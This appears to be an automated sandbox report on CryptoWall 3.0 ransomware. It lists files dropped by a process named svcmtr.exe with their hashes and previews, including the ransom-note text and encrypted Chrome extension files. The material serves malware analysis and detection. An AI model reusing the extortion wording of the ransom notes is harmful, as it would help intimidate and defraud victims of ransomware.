                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_16.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1006
                                                                                                                          Entropy (8bit):7.381670871302546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2tPxXSirN6zQgqAYXoMT1ZFZLRctdPF:c+9U40oDgStSQwYXoMT1nkd
                                                                                                                          MD5:39F5E5BA97430224921BF865DCAE3DED
                                                                                                                          SHA1:830DB583B45B0FB8D5BAAAF7C7547EA21EEB6366
                                                                                                                          SHA-256:BFC74C08BF5F50948A157AF89AD3F962D2031555E0CAFC9F55C69C1A0E44BDB6
                                                                                                                          SHA-512:0B4D442711BA9464E62AA7B2E37D04232F60CCB9181267F1FF95547BC55EA1CDEC01D04C3CE13B1D1204145A94A0D6B645D777B54F3104731BEB0FAD9FC09B2B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......h.g.P,.`#KrN....$@....'.+.w.+AI!v..R..V.......EN&...$.h...*..8......7...........^...pJg.^E.L'{.N..6..Q.(n.@.....6..X.?.......s!..e.J..g..YMu...O=y.[.1.w......u...(/]....UT.9!1.U9.GU2.)G.+Ub.......>........&....0IX.i.G.w.n.g..\..`g..5%WB....f..4.be.\.=6.=Q.0..>....1`......7M....J...H..$|F'..S.ye2.Rg."P./\.Qh.v.N.....x........^E.C...`...`...z.|...........C.8...C.]..x4J.g.Y.[.e...2..j..,}..@..c...q3..^^.q..}(....+..|..u^..Hi...O....u>..6.`D..."a..%w.9h..9.,.*wg..k...w.d.TyB......../.9...c..u.i.!....lN..........=.".....x..9O.2......-..v@..]...n.......]7..

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\main.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.338732154224879
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2fLvmNWDGxArI:c+z5U4a8OoDUX+S2SNWDGxAU
                                                                                                                          MD5:4A1A5591251F295EF69EE166E1E25029
                                                                                                                          SHA1:C890ACF5E4C86AC94C7A5CE857B4E9D9A66E9C94
                                                                                                                          SHA-256:A833299AD64403E10C37B5D48635752D956A50FD37B7E21EEFAE15BAD7579F6F
                                                                                                                          SHA-512:1467E6D4F06BA1823ECE13DF5668DF56C415EC41358D3CE708DE726B6C27AFAD4A954381B26E68F2A2D3F36ABD7D6034A706148F430AA018D5DD96827C8057F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...bi.}3...pD.B.._....M.../.M.O....I....3.........g.Z.O.....zz..&.....T.1..FM.[...B.m....i4.].K.QemY.juO@fu.....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):974
                                                                                                                          Entropy (8bit):7.359582985844575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2zAx7nv/X3rhK2Lbj893HM1a/B:c+9U40oDg/h54930a/B
                                                                                                                          MD5:3AEFA66DEC637FF66E0B51D9217230DE
                                                                                                                          SHA1:D2A4100685FF1E53C89E043EFF073BDE2F7157DB
                                                                                                                          SHA-256:FC6E6900B4AD8B7A07813E4CB6B76CC6B23C0AB497BBCFEE79DA234F8B8D36A4
                                                                                                                          SHA-512:D589CB93A000D3C4A89119AA05740127CE8D61C74EF6FF58710E849FB1BF602556488B0A250DEE71B1A4C16FF3B300A507D8AC2EFA73312419DE1E2DB2CA4C78
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...=.@.OT......5......*..hO...x...Q.h...{..Y..%i..KKn;.Y.X/.=.ak.l.E.\R._].<.o.JD.*......=...Fd...e..R..H......].#.......'V...6Uh.. ..n.nG.S......G......O..EG....s.iH..:sVA-.e.@..s..q4<&w..z1:....R..,.Dv......w7...gb. )h.....Mv.1R..Zbe...=0g...v{H.RP.....^..3...zQ..ox.&/-.......`..(.`.z..G....,..h....m...E.5..OW.@h..$...6........].W..e..h.<.d&h..#h3.<0=.*.`.7kg..]4./.}...A...?.......$..sCl.....U.CpF?=\.....KI^R.y6t.B...n.e^..|.;*.....&v..T~..7.<C...T$h.I%.8`.}u.....>.pAH..<Rt....{.K..^...Q`...P.I....>.N.>..G.Y.g=.7..W?.8.?.qr..*..F*...~..0.8.e...eC.k..

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.361406768372272
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2xKqMmxFylR7:c+z5U4a8OoDUX+S2ZXFy
                                                                                                                          MD5:DED38ED2CFC47889A13C8C9491B16D54
                                                                                                                          SHA1:19E53E29D08EBC583A452210B206349099A131F3
                                                                                                                          SHA-256:288E21E8451934CC4F5ADC10572E67634CDDAE50BFF21DE8F03F338CD8E026DD
                                                                                                                          SHA-512:F3AEB20A51F2D160AFEC6BDC3127C23058E58E2028F37A37C93EFE11F903A7A78FDED6AAF8DC947EEAEA4C352341E9FC63086252F2E9A8854DE58061A878E543
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...c.kz....>.o..6.[....i..xG..3...(..d~cs...$.....&..g....B...Am..v....q..(j.....7....q...&..~......-....S\\C

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\128.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4334
                                                                                                                          Entropy (8bit):7.932371040727839
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDt6QcuF+ChoiyHf/xLahSQcBNg3fYTt4GdFabPFNEaPxZT:GopyCwHfZW8CKeGd6DbTT
                                                                                                                          MD5:32007FC6DEF4D91E8E4A8880092CB3CD
                                                                                                                          SHA1:29C1F3F6965CE41A9D858C6A231D0BA9DCFA6FE0
                                                                                                                          SHA-256:445D5310758FF9CF500BDCA539F3F4EC379CB38EA4AF135AF4F103834EB4D425
                                                                                                                          SHA-512:5CD44AF5078449B63689F0B2452BCBF037321AD502403D09E5B4B0A8FDF1C3C16CC16E072B827434ABE62204366A47FEAE19E6C4A2DF634AC8D4FE9EC0685205
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.......'h.~.#..XD...&.....S.^.....,\..C...y...1b.....*..]..;T..%.R>g..c.....gLg9......G........'......k{.c.a...st.:[.....>.G.?...g...n.....#....................+1.ib..t.{P....9..F..w.:zG.v={P,.. .)..6.\,........tr..bp..ad.. ......@..D...|..nI.j.W".H.3C....oPw.. ..9.n......8.us.?.s.o......]..)...G@.U...I.r....%.r..4A..<.j..=e...?/I.@eHr2/....J..DMr_NLFEA..3a..[...%..|Y......Y..i9.7....)]...J'M..f(^[.`..E....3*.....I.:.:.b].O1=o......./..7DqT..j.y../.B........a..m...+.I....tq..*.+.|V3.g5..[...........^..j......C...v..a....."|.).i6.J/...l..D(h....0.._g.B..Q;0.D.(

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.911208594480593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0e/EVbBp7JXQc6zyi4jQEuSSTAeUqlwfuzAe05:GoAXBp7J8ybjQCSMwWIAf5
                                                                                                                          MD5:968FF9DB2147D42528980E43BCE6ED31
                                                                                                                          SHA1:72D6A7A9589FD89BB2DF3FDF6B5569A856B6A4EB
                                                                                                                          SHA-256:142781179EC36F5F985398FEA8DE4D425DA9E823F72C4C559937DD5A125B098C
                                                                                                                          SHA-512:55A72D01113D63992046510E08E432B45F4F64FBF8807983D7293E84B9B629342271F64BE359B48D4212940CD21618E02B617460B706B73EBA6FD08F6948A48E
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.."......u.#.I...&....*./..".?x.l.(u.+.1u.....n....h.a.s>T[.._f./...)..km.v.(4......|&o...<U..{K.=..2Q....]..].....N.....o.[*..7t..2....L..W...m(...k.7.Ip ;j..KF.......XL..k?...GbzZ..(.}*.E..1....9....epY...}g..b.:..j...}.F...K.....hE.v..B..}g.8....Je6.....3yz.v.T............i."1...:.....:.......o. @chE.<....;...*..y.K..r..}sK.O.F..H....CQ>V......9.....W?iV.d.g."...X....%.9....F..........$v..eh./;M....t.J..){..UO....s..>.!.A@.^..)..>....u6~.c....c.b"...Z.[....z....X$U...<Pn.Y...9`...j...u....I....:e)....s...e(...N..P..'.s}..Bf...|X...]..=],.Q.O7...L.Dy4}.ktH/.8...bko....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4238
                                                                                                                          Entropy (8bit):7.9223498801309375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD5yP8FfseiOCujWco0eAXkoa6m4BTZWHzu/HWupoi:GoV/FfJwWTo0eAXkaNBT0z42uSi
                                                                                                                          MD5:59D69FF28622B32C7A842E5AC6F9312A
                                                                                                                          SHA1:95151C22A60BE3A4C6D3C837060D1EEC0B05A376
                                                                                                                          SHA-256:0E996F84008C16EC8FB1EB80EDD27B0EA6076C072F6BBB91957F5B7E6135F762
                                                                                                                          SHA-512:C7591276042E344EB6AB1712A2A680EFB2017DC7D65B3E8B8ECDB1886EA16F239A2EE6763BF66D07526F3A9A96459015DC839B58C77BC409DF863C9395968472
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...*...<.._....ki.....j....gAD...F.....cu.G..0Qx/$.WrF..AI.4..2.vU.lw.J ....../....PY.S?.........a.Q.=......."...Tz..[..J).......E...d*..f.b....<...\.Q.`/..d...zg.?JU.O.g.....N......O.|.t:.q...KQI.....n..^...4U[..=Q.....q..C.5p..B.....k...h...@*....v"...Q......[...3l.h............-......IQL.V.qz..e......E.C....C.2.'.i.4s..x..ENeok...h"]..".^YP..z./.w...E.O.H.....(\r.O(.....p....E1...@<*....A.D..VO..=s...G......H..}=u..Q..[..@..F@.].#...zU./..U?..+W0>...p.Ea/D..?...t.".Zx>U_-e...4.P.~.9v.#...3...g.".J h.-T..*a./.......@..Nkn..Hi.#$!.m.>.J!.v.<^n.$.B.[{G....~.e...l.=......n.

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):990
                                                                                                                          Entropy (8bit):7.371744844825426
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:c+z5U4a8OoDUX+S2ZU1yuD186wDPTsR9FuEbSuJc7Agc:c+9U40oDgfRpbSuEc
                                                                                                                          MD5:136B58C027AC4D70326E2BEBC260BFD5
                                                                                                                          SHA1:6E02C5567EFBBE3BCA9347850FA9F7965DB854B2
                                                                                                                          SHA-256:52899A444C10BE917910AB50F158BF77E286C02034E4FC3AD7B291A94A51C1C2
                                                                                                                          SHA-512:65E82D38DF126AE9A9144CDB521415C14CA870620DA8CE24AE7674FF30415317B423C712D7726C850F5AB8E2F0AFB81F4248CDDA401F274D4682020CF031E85B
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Ehr..Z...lf.0>...8g..d.........[_{Q8.g..n..n..6s.....P.0..p..#....b...a+9..f&{.W.....K./..3.-...e.].+........8.-.o...{.'...2...........z.._._.q.i..7$.A.2.bG}.../)..Z..._7a.x.c..9be..~.^..^ J9.]......F 9.........N.&h,..K....7S....-.e.z.....n...}.......T/qJm.K.....H 5.. ...df&...a..Ca...}Z..n_.pZ.....y..-..5..\Gn(55wE....)..x.6.F.p..9..D.i}..UV...\_[.........Y..3Jw..a.X....B:...;;.yO......'\\......../....Wi.q.o.-.....N.......9.Vs.....'t...Vk..,n...N..[#.#..7.'>:..UR..c..#1.T_....v...rh.PQ.F..Z,....Y..<.sU.D...B#........@U...ia.>.ie.............p....@.......Ut

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):510
                                                                                                                          Entropy (8bit):6.396937783387186
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:xq+z5n0ZvdaaXqzxbRUgKFvFGfOob5ZUXbpcS2/do+2EMbsEdGhb:c+z5U4a8OoDUX+S2VZYbs
                                                                                                                          MD5:63C966270D0FB0A01400A8F2EE3E1D7F
                                                                                                                          SHA1:F7D3B131E375BA9B60687FA85FCD1949FF6687D4
                                                                                                                          SHA-256:12F455C43E417B3250E48E8930D56478BE5B9C73E238BECB82523E607AFF71FD
                                                                                                                          SHA-512:45442A5914B01223159FC330C08D145A32FA08F46396D2A172D24DABF67EC3BEED70A7F00CF5E93E7B4AAB1E337630CB2C25BF2A9FEDA6FB6958A8F8126E4657
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264......Je...r.y..._...D.b.l.y....[...(..Jo*Z,.f..a...Z0j.-%..O7!......p....];..4.=....8x........q.....}.^.N(

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\128.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5822
                                                                                                                          Entropy (8bit):7.956827028163817
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoD0fN3xUVWGtI/AFvX1kRTKOLL0mcwW3kCvFLnqLYN8GHsnMuU8IwdB:Goo+VWGtZFsTKoO+yFLCtEsMprwb
                                                                                                                          MD5:754DF98ED3768CEF2A59ABA82A34C6AB
                                                                                                                          SHA1:3E0C6369B74EE53137649EC991DFE7E83A27F207
                                                                                                                          SHA-256:772FE191610850FA7D9E47279247C7FD0EA91959CB1DBBFAA153D481BD17982C
                                                                                                                          SHA-512:1C4593B84E7114EFD98B1D46884454A360ED1BD7AF5D5AF158570FC1068F357C93899DC5240EEF5219EB976D3BB2E3E9D7631B2900C8D0FEDEF549F5A9B9377D
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..L..b23-.azq..3......+A4.+... ."$:J.*..{w..%i[..J../mmr....H......7#.X.].U._...........S4..H.1:)..{G.e.cb#<\t.......e......+.UO..+..W..5....Z."8|[1.<...T...........!*i.#..y..{...@.5.......49...{F...<.e6.}y(.n.6rbR...K.e.>.E..eZ..8p..........J..........(..D.u...W..._....R.....eL.....`.^...)..I..R7.fR{hs'-..-...Q.X)...i"...e....w.^..b.....sLG.t..ne...o.t.....j.g.5.q)....iN.... .....a...5K..@..O.g.......0.P..g.\T....k....-f.E./iA..F.Y..Y."..[.\f.......ZiE .U...6.....r.gq.\=ID....-...')..^3}R...?.&g..%...a.......T% ...'i.K.R\.....@d.f..&G..w....H.u..4.Y..ZML.2..He....

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fil\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
